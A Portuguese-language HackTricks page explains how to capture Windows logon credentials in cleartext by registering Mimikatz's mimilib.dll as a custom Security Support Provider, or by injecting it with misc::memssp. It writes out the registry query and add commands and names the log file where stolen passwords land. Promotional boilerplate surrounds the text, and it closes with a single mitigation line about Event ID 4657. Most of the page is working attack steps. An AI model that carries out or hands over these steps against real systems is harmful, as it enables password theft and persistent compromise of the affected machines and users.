3.7 KiB
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.
SSP Personalizado
Aprenda o que é um SSP (Provedor de Suporte de Segurança) aqui.
Você pode criar seu próprio SSP para capturar em texto claro as credenciais usadas para acessar a máquina.
Mimilib
Você pode usar o binário mimilib.dll
fornecido pelo Mimikatz. Isso registrará em um arquivo todas as credenciais em texto claro.
Coloque a dll em C:\Windows\System32\
Obtenha uma lista dos Pacotes de Segurança LSA existentes:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
Adicione mimilib.dll
à lista de Provedor de Suporte de Segurança (Pacotes de Segurança):
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
E após um reinício, todas as credenciais podem ser encontradas em texto claro em C:\Windows\System32\kiwissp.log
Na memória
Você também pode injetar isso diretamente na memória usando Mimikatz (note que isso pode ser um pouco instável/não funcionar):
privilege::debug
misc::memssp
Mitigação
ID do Evento 4657 - Auditoria da criação/alteração de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Participe do grupo 💬 Discord ou do grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.